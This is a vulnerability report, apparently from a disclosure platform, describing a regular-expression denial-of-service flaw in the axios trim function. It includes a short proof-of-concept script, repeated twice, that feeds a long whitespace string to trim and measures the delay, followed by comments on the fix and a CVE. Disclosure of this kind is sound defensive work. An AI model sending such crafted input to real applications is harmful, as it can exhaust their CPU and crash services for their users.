Inefficient Regular Expression Complexity in axios/axios
Reported on
Aug 26th 2021
βοΈ Description
A ReDoS (regular expression denial of service) flaw was found in the axios package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.
Similar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753
π΅οΈββοΈ Proof of Concept
Create the following poc.js
// poc.js
var {trim} = require("axios/lib/utils");
function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "1";
}
var time = Date.now();
trim(build_blank(50000))
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost)
Execute the following command in another terminal:
npm i axios
node poc.js
Check the Output:
time_cost: 2639
π₯ Impact
This vulnerability is capable of exhausting system resources and leads to crashes. π Location utils.js#L188
Occurrences
var {trim} = require("axios/lib/utils");
function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "1";
}
var time = Date.now();
trim(build_blank(50000))
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost)
@admin Can you please help to report this in the GitHub repo?
@admin The issue got confirmed and fixed in https://github.com/axios/axios/pull/3980(proposed by me) Fix: https://github.com/axios/axios/commit/5b457116e31db0e88fede6c428e969e87f290929
CVE published! π
It should be added to the National Vuln. Database shortly.
is this only in version 0.21.2? why not add this fix in the latest version?